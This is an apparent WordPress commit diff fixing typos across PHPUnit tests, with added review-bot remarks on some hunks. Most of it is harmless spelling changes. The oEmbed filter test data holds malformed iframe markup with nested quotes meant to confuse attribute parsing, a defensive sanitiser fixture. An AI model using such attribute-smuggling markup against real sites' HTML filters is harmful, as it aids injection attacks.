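 'expected' => 'Example: WordPress, test (some text), I love example.com (<a href="http://example.com" rel="nofollow">http://example.com</a>), it is brilliant',
 ),
 'real world: (URL)...' => array(
- 'text' => 'Some text followed by a bracketed link with a trailing elipsis (http://example.com)...',
- 'expected' => 'Some text followed by a bracketed link with a trailing elipsis (<a href="http://example.com" rel="nofollow">http://example.com</a>)...',
+ 'text' => 'Some text followed by a bracketed link with a trailing ellipsis (http://example.com)...',
+ 'expected' => 'Some text followed by a bracketed link with a trailing ellipsis (<a href="http://example.com" rel="nofollow">http://example.com</a>)...',
 ),
 'real world: (here: URL)' => array(
 'text' => 'In his famous speech “You and Your research” (here: http://www.cs.virginia.edu/~robins/YouAndYourResearch.html) Richard Hamming wrote about people getting more done with their doors closed...',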
<a id="trunktestsphpunittestsformattingsanitizeTextFieldphp"></a>
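--- a/trunk/tests/phpunit/tests/formatting/sanitizeTextField.php
+++ b/trunk/tests/phpunit/tests/formatting/sanitizeTextField.php
@@ -103,15 +103,15 @@
 ),
 array(
 '%AB%BC%DE', // Just octets.
- '', // Emtpy as we strip all the octets out.
+ '', // Empty as we strip all the octets out.
 ),
 array(
- 'Invalid octects remain %II',
- 'Invalid octects remain %II',
+ 'Invalid octets remain %II',
+ 'Invalid octets remain %II',
 ),
 array(
- 'Nested octects %%%ABABAB %A%A%ABBB',
- 'Nested octects',
+ 'Nested octets %%%ABABAB %A%A%ABBB',
+ 'Nested octets',
 ),
 array(
 array(),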
<a id="trunktestsphpunittestsformattingwpAutopphp"></a>
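--- a/trunk/tests/phpunit/tests/formatting/wpAutop.php
+++ b/trunk/tests/phpunit/tests/formatting/wpAutop.php
@@ -567,7 +567,7 @@
 }
 
 /**
- * wpautop() should convert multiple line breaks into a paragraph regarless of <br /> format
+ * wpautop() should convert multiple line breaks into a paragraph regardless of <br /> format
 *
 * @ticket 33377
 */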
<a id="trunktestsphpunittestsfunctionscleanDirsizeCachephp"></a>
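--- a/trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php
+++ b/trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php
@@ -88,7 +88,7 @@
 'path' => 'string',
 'expected_count' => 1,
 ),
- 'non-existant string, but non-path' => array(
+ 'non-existent string, but non-path' => array(
 'path' => 'doesnotexist',
 'expected_count' => 2,
 ),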
<a id="trunktestsphpunittestsfunctionswpMysqlWeekphp"></a>
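--- a/trunk/tests/phpunit/tests/functions/wpMysqlWeek.php
+++ b/trunk/tests/phpunit/tests/functions/wpMysqlWeek.php
@@ -7,7 +7,7 @@
 *
 * @covers ::_wp_mysql_week
 */
-class Tests_Functons_WpMysqlWeek extends WP_UnitTestCase {
+class Tests_Functions_WpMysqlWeek extends WP_UnitTestCase {
 
 /**
 * @ticket 59931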
<a id="trunktestsphpunittestsfunctionsphp"></a>
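--- a/trunk/tests/phpunit/tests/functions.php
+++ b/trunk/tests/phpunit/tests/functions.php
@@ -263,7 +263,7 @@
 // Test slashes in names.
 $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\fg.png' ), 'Slash not removed' );
 $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\\fg.png' ), 'Double slashed not removed' );
- $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\\\fg.png' ), 'Tripple slashed not removed' );
+ $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\\\fg.png' ), 'Triple slashed not removed' );
 }
 
 /**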
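Review bot: The three inputs in this hunk do not hold one, two and three backslashes as their assertion messages claim, at least as the strings are rendered here. In a single-quoted PHP string `\\` is an escaped backslash, so `'abcde\fg.png'` and `'abcde\\fg.png'` are the same one-backslash name, and `'abcde\\\fg.png'` holds two; the three-backslash case of `wp_unique_filename()` is therefore not exercised. Since this covers filename sanitisation, I would spell the inputs out, `'abcde\\\\fg.png'` for the double case and `'abcde\\\\\\fg.png'` for the triple case, and say "backslash" in the messages. The test method starts above the hunk, so how `$testdir` is set up is not visible.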
<a id="trunktestsphpunittestshttphttpphp"></a>
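--- a/trunk/tests/phpunit/tests/http/http.php
+++ b/trunk/tests/phpunit/tests/http/http.php
@@ -47,7 +47,7 @@
 array( '../file-in-parent.ext', 'http://example.com/directory/', 'http://example.com/file-in-parent.ext' ),
 array( '../file-in-parent.ext', 'http://example.com/directory/filename', 'http://example.com/file-in-parent.ext' ),
 
- // Location provided in muliple levels higher, including impossible to reach (../ below DOCROOT).
+ // Location provided in multiple levels higher, including impossible to reach (../ below DOCROOT).
 array( '../../file-in-grand-parent.ext', 'http://example.com', 'http://example.com/file-in-grand-parent.ext' ),
 array( '../../file-in-grand-parent.ext', 'http://example.com/filename', 'http://example.com/file-in-grand-parent.ext' ),
 array( '../../file-in-grand-parent.ext', 'http://example.com/directory/', 'http://example.com/file-in-grand-parent.ext' ),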
<a id="trunktestsphpunittestsimageheaderphp"></a>
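--- a/trunk/tests/phpunit/tests/image/header.php
+++ b/trunk/tests/phpunit/tests/image/header.php
@@ -140,7 +140,7 @@
 )
 );
 
- // Create inital crop object.
+ // Create initial crop object.
 $cropped_1 = 'foo-cropped-1.png';
 $object = wp_copy_parent_attachment_properties( $cropped_1, $id, 'custom-header' );
 
@@ -148,7 +148,7 @@
 $previous = $this->custom_image_header->get_previous_crop( $object );
 $this->assertFalse( $previous );
 
- // Create the inital crop attachment and set it as the header.
+ // Create the initial crop attachment and set it as the header.
 $cropped_1_id = $this->custom_image_header->insert_attachment( $object, $cropped_1 );
 $key = '_wp_attachment_custom_header_last_used_' . get_stylesheet();
 update_post_meta( $cropped_1_id, $key, time() );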
<a id="trunktestsphpunittestsimageintermediateSizephp"></a>
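--- a/trunk/tests/phpunit/tests/image/intermediateSize.php
+++ b/trunk/tests/phpunit/tests/image/intermediateSize.php
@@ -114,7 +114,7 @@
 * @requires function imagejpeg
 */
 public function test_get_intermediate_sizes_by_array_exact() {
- // Only one dimention match shouldn't return false positive (see: #17626).
+ // Only one dimension match shouldn't return false positive (see: #17626).
 add_image_size( 'test-size', 330, 220, true );
 add_image_size( 'false-height', 330, 400, true );
 add_image_size( 'false-width', 600, 220, true );
@@ -184,7 +184,7 @@
 // Use this width.
 $width = 300;
 
- // Only one dimention match shouldn't return false positive (see: #17626).
+ // Only one dimension match shouldn't return false positive (see: #17626).
 add_image_size( 'test-size', $width, 0, false );
 add_image_size( 'false-height', $width, 100, true );
 
@@ -213,7 +213,7 @@
 // 202 is the smallest height that will trigger a miss for 'false-height'.
 $height = 202;
 
- // Only one dimention match shouldn't return false positive (see: #17626).
+ // Only one dimension match shouldn't return false positive (see: #17626).
 add_image_size( 'test-size', 0, $height, false );
 add_image_size( 'false-height', 300, $height, true );
 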
<a id="trunktestsphpunittestsimagemetaphp"></a>
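--- a/trunk/tests/phpunit/tests/image/meta.php
+++ b/trunk/tests/phpunit/tests/image/meta.php
@@ -98,7 +98,7 @@
 */
 public function test_exif_error() {
 // https://core.trac.wordpress.org/ticket/6571
- // This triggers a warning mesage when reading the Exif block.
+ // This triggers a warning message when reading the Exif block.
 $out = wp_read_image_metadata( DIR_TESTDATA . '/images/waffles.jpg' );
 
 $this->assertSame( '0', $out['aperture'], 'Aperture value not equivalent' );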
<a id="trunktestsphpunittestsinteractivityapiwpInteractivityAPIphp"></a>
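--- a/trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php
+++ b/trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php
@@ -549,7 +549,7 @@
 * @covers ::process_directives
 */
 public function test_process_directives_doesnt_fail_with_unknown_directives() {
- $html = '<div data-wp-uknown="">Text</div>';
+ $html = '<div data-wp-unknown="">Text</div>';
 $processed_html = $this->interactivity->process_directives( $html );
 $this->assertEquals( $html, $processed_html );
 }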
<a id="trunktestsphpunittestsinteractivityapiwpInteractivityAPIDirectivesProcessorphp"></a>
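--- a/trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php
+++ b/trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php
@@ -421,7 +421,7 @@
 $this->assertTrue( $p->has_and_visits_its_closer_tag() );
 }
 
- // Test an upercase tag.
+ // Test an uppercase tag.
 $content = '<IMG src="example.jpg">';
 $p = new WP_Interactivity_API_Directives_Processor( $content );
 $p->next_tag();
@@ -781,7 +781,7 @@
 
 /**
 * Tests that skip_to_tag_closer skips to the next tag,
- * independant of the content.
+ * independent of the content.
 *
 * @ticket 60517
 *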
<a id="trunktestsphpunittestsinteractivityapiwpInteractivityAPIFunctionsphp"></a>
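--- a/trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php
+++ b/trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php
@@ -71,7 +71,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_single_interactive_block() {
+ public function test_process_directives_of_single_interactive_block() {
 $post_content = '<!-- wp:test/interactive-block { "block": 1 } /-->';
 $rendered_blocks = do_blocks( $post_content );
 $p = new WP_HTML_Tag_Processor( $rendered_blocks );
@@ -87,7 +87,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_multiple_interactive_blocks_in_paralell() {
+ public function test_process_directives_of_multiple_interactive_blocks_in_parallel() {
 $post_content = '
 <!-- wp:test/interactive-block { "block": 1 } /-->
 <!-- wp:test/interactive-block-2 { "block": 2 } /-->
@@ -113,7 +113,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_interactive_block_inside_non_interactive_block() {
+ public function test_process_directives_of_interactive_block_inside_non_interactive_block() {
 $post_content = '
 <!-- wp:test/non-interactive-block { "block": 1 } -->
 <!-- wp:test/interactive-block { "block": 2 } /-->
@@ -133,7 +133,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_multple_interactive_blocks_inside_non_interactive_block() {
+ public function test_process_directives_of_multiple_interactive_blocks_inside_non_interactive_block() {
 $post_content = '
 <!-- wp:test/non-interactive-block { "block": 1 } -->
 <!-- wp:test/interactive-block { "block": 2 } /-->
@@ -156,7 +156,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_interactive_block_inside_multple_non_interactive_block() {
+ public function test_process_directives_of_interactive_block_inside_multiple_non_interactive_block() {
 $post_content = '
 <!-- wp:test/non-interactive-block { "block": 1 } -->
 <!-- wp:test/interactive-block { "block": 2 } /-->
@@ -181,7 +181,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_interactive_block_containing_non_interactive_block_without_directives() {
+ public function test_process_directives_of_interactive_block_containing_non_interactive_block_without_directives() {
 $post_content = '
 <!-- wp:test/interactive-block { "block": 1 } -->
 <!-- wp:test/non-interactive-block { "block": 2 } /-->
@@ -203,7 +203,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_interactive_block_containing_non_interactive_block_with_directives() {
+ public function test_process_directives_of_interactive_block_containing_non_interactive_block_with_directives() {
 $post_content = '
 <!-- wp:test/interactive-block { "block": 1 } -->
 <!-- wp:test/non-interactive-block { "block": 2, "hasDirective": true } /-->
@@ -226,7 +226,7 @@
 *
 * @covers wp_interactivity_process_directives_of_interactive_blocks
 */
- public function test_processs_directives_of_interactive_block_containing_nested_interactive_and_non_interactive_blocks() {
+ public function test_process_directives_of_interactive_block_containing_nested_interactive_and_non_interactive_blocks() {
 $post_content = '
 <!-- wp:test/interactive-block { "block": 1 } -->
 <!-- wp:test/interactive-block-2 { "block": 2 } -->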
<a id="trunktestsphpunittestsksesphp"></a>
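--- a/trunk/tests/phpunit/tests/kses.php
+++ b/trunk/tests/phpunit/tests/kses.php
@@ -1362,7 +1362,7 @@
 * @ticket 33121
 */
 public function test_wp_kses_attr_data_attribute_is_allowed() {
- $test = '<div data-foo="foo" data-bar="bar" datainvalid="gone" data--invaild="gone" data-also-invaild-="gone" data-two-hyphens="remains">Pens and pencils</div>';
+ $test = '<div data-foo="foo" data-bar="bar" datainvalid="gone" data--invalid="gone" data-also-invalid-="gone" data-two-hyphens="remains">Pens and pencils</div>';
 $expected = '<div data-foo="foo" data-bar="bar" data-two-hyphens="remains">Pens and pencils</div>';
 
 $this->assertSame( $expected, wp_kses_post( $test ) );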
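Review bot: The fixture on the added `$test` line packs three rejection cases into one string, with no comment saying which naming rule each attribute breaks. Judging by `$expected`, `datainvalid` (apparently no hyphen after `data`), `data--invalid` (hyphen directly after the prefix) and `data-also-invalid-` (trailing hyphen) are stripped by `wp_kses_post()`, while `data-two-hyphens` is kept. I would add a comment above `$test`, such as `// Stripped: no hyphen after "data", a leading double hyphen, a trailing hyphen.`, so a later change to the attribute filter has a stated contract to compare against. The spelling fix changes the attribute names the sanitiser sees, but not the shape of each case. The test method continues past the end of the hunk.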
<a id="trunktestsphpunittestslinkthemeFilephp"></a>
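--- a/trunk/tests/phpunit/tests/link/themeFile.php
+++ b/trunk/tests/phpunit/tests/link/themeFile.php
@@ -116,7 +116,7 @@
 *
 * @dataProvider data_theme_files
 */
- public function test_theme_file_existance( $file, $expected_theme, $existence ) {
+ public function test_theme_file_existence( $file, $expected_theme, $existence ) {
 
 if ( in_array( 'theme-file-child', $existence, true ) ) {
 $this->assertFileExists( WP_CONTENT_DIR . "/themes/theme-file-child/{$file}" );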
<a id="trunktestsphpunittestsmediaphp"></a>
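--- a/trunk/tests/phpunit/tests/media.php
+++ b/trunk/tests/phpunit/tests/media.php
@@ -434,7 +434,7 @@
 * @ticket 38965
 */
 public function test_wp_prepare_attachment_for_js_without_image_sizes() {
- // Create the attachement post.
+ // Create the attachment post.
 $id = wp_insert_attachment(
 array(
 'post_title' => 'Attachment Title',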
<a id="trunktestsphpunittestsmenuwpAjaxMenuQuickSearchphp"></a>
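--- a/trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php
+++ b/trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php
@@ -3,7 +3,7 @@
 /**
 * @group menu
 */
-class Tests_Menu_WpAjaxMenuQuickSeach extends WP_UnitTestCase {
+class Tests_Menu_WpAjaxMenuQuickSearch extends WP_UnitTestCase {
 
 /**
 * Test search returns results for pages.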
<a id="trunktestsphpunittestsmetadeleteMetadataphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/meta/deleteMetadata.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/meta/deleteMetadata.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/meta/deleteMetadata.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -53,7 +53,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 32224
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * This is a backwards compatiblity quirk.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * This is a backwards compatibility quirk.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_meta_value_should_be_ignored_when_empty_string() {
</span><span class="cx" style="display: block; padding: 0 10px"> $vals = array( '0', '1', '2', '' );
</span></span></pre></div>
<a id="trunktestsphpunittestsmultisiteavoidBlogPagePermalinkCollisionphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -12,7 +12,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> protected static $site_id;
</span><span class="cx" style="display: block; padding: 0 10px"> protected static $root_page;
</span><span class="cx" style="display: block; padding: 0 10px"> protected static $child_page;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- protected static $post_and_blog_path = 'permalink-collison';
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ protected static $post_and_blog_path = 'permalink-collision';
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Create a blog and the pages we need to test the collision.
</span></span></pre></div>
<a id="trunktestsphpunittestsmultisitesitephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/multisite/site.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/multisite/site.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/multisite/site.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -844,7 +844,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $value The sanitized option value.
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $option The option name.
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $original_value The original value passed to the function.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return string The orginal value.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return string The original value.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function filter_allow_unavailable_languages( $value, $option, $original_value ) {
</span><span class="cx" style="display: block; padding: 0 10px"> return $original_value;
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2149,7 +2149,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Tests whether all expected meta are provided in deprecated `wpmu_new_blog` action.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @dataProvider data_wpmu_new_blog_action_backward_commpatible
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @dataProvider data_wpmu_new_blog_action_backward_compatible
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 46351
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2214,7 +2214,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->wp_initialize_site_meta = $meta;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function data_wpmu_new_blog_action_backward_commpatible() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function data_wpmu_new_blog_action_backward_compatible() {
</ins><span class="cx" style="display: block; padding: 0 10px"> return array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'default values' => array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(),
</span></span></pre></div>
<a id="trunktestsphpunittestsmultisiteupdateBlogStatusphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/multisite/updateBlogStatus.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/multisite/updateBlogStatus.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/multisite/updateBlogStatus.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -9,7 +9,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> class Tests_Multisite_UpdateBlogStatus extends WP_UnitTestCase {
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Updating a field returns the sme value that was passed.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Updating a field returns the same value that was passed.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_update_blog_status() {
</span><span class="cx" style="display: block; padding: 0 10px"> $result = update_blog_status( 1, 'spam', 0 );
</span></span></pre></div>
<a id="trunktestsphpunittestsoembedfilterResultphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/oembed/filterResult.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/oembed/filterResult.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/oembed/filterResult.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -108,8 +108,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> '<blockquote class="wp-embedded-content"><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title="Hola" width="100"></iframe></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title="Hola"></iframe>',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- "<blockquote><iframe title=' width=\"'></iframe></blockquote><iframe title='' height=' title=' width=\"'' heigt='123'\"></iframe>",
- '<blockquote class="wp-embedded-content"><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width=""></iframe></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width="" height=\' title=\' width="\'\' heigt=\'123\'"></iframe>',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ "<blockquote><iframe title=' width=\"'></iframe></blockquote><iframe title='' height=' title=' width=\"'' height='123'\"></iframe>",
+ '<blockquote class="wp-embedded-content"><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width=""></iframe></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width="" height=\' title=\' width="\'\' height=\'123\'"></iframe>',
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
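Review bot: The two changed lines in this data set are sanitizer test fixtures rather than documentation, which is easy to miss in a commit titled as a docs typo fix: `heigt='123'` becomes `height='123'` in both the input markup and the expected output. As far as the visible strings show, that token sits inside the double-quoted `width` value, so the case now feeds the oEmbed result filter attribute-like text that spells a real attribute name rather than an unknown one. The assertion stays self-consistent, but it is a slightly different input from the one the test covered before, and the page does not show whether the misspelling was deliberate. I would add a comment above the case, for example `// Attribute-like text inside a quoted value must pass through unchanged.`, and keep the old input/expected pair as an additional case if it was intentional. The data provider method starts and ends outside this hunk.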
<a id="trunktestsphpunittestspostgetPageUriphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/getPageUri.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/getPageUri.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/getPageUri.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -11,7 +11,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_get_page_uri_with_stdclass_post_object() {
</span><span class="cx" style="display: block; padding: 0 10px"> $post_id = self::factory()->post->create( array( 'post_name' => 'get-page-uri-post-name' ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Mimick an old stdClass post object, missing the ancestors field.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Mimic an old stdClass post object, missing the ancestors field.
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_array = (object) get_post( $post_id, ARRAY_A );
</span><span class="cx" style="display: block; padding: 0 10px"> unset( $post_array->ancestors );
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestspostgetPostTypeLabelsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/getPostTypeLabels.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/getPostTypeLabels.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/getPostTypeLabels.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -16,7 +16,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_returns_hierachical_labels() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_returns_hierarchical_labels() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $labels = get_post_type_labels(
</span><span class="cx" style="display: block; padding: 0 10px"> (object) array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'name' => 'foo',
</span></span></pre></div>
<a id="trunktestsphpunittestspostisPostStatusViewablephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/isPostStatusViewable.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/isPostStatusViewable.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/isPostStatusViewable.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -48,7 +48,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function data_custom_post_statuses() {
</span><span class="cx" style="display: block; padding: 0 10px"> return array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // 0. False for non-publically queryable types.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // 0. False for non-publicly queryable types.
</ins><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'publicly_queryable' => false,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -57,7 +57,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> false,
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // 1. True for publically queryable types.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // 1. True for publicly queryable types.
</ins><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'publicly_queryable' => true,
</span></span></pre></div>
<a id="trunktestsphpunittestspostmetaRevisionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/metaRevisions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/metaRevisions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/metaRevisions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -187,7 +187,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * Check the meta values to verify they are NOT revisioned - they are not revisioned by default.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Custom post meta should NOT be restored, orignal value should not be restored, value still 'update1'.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Custom post meta should NOT be restored, original value should not be restored, value still 'update1'.
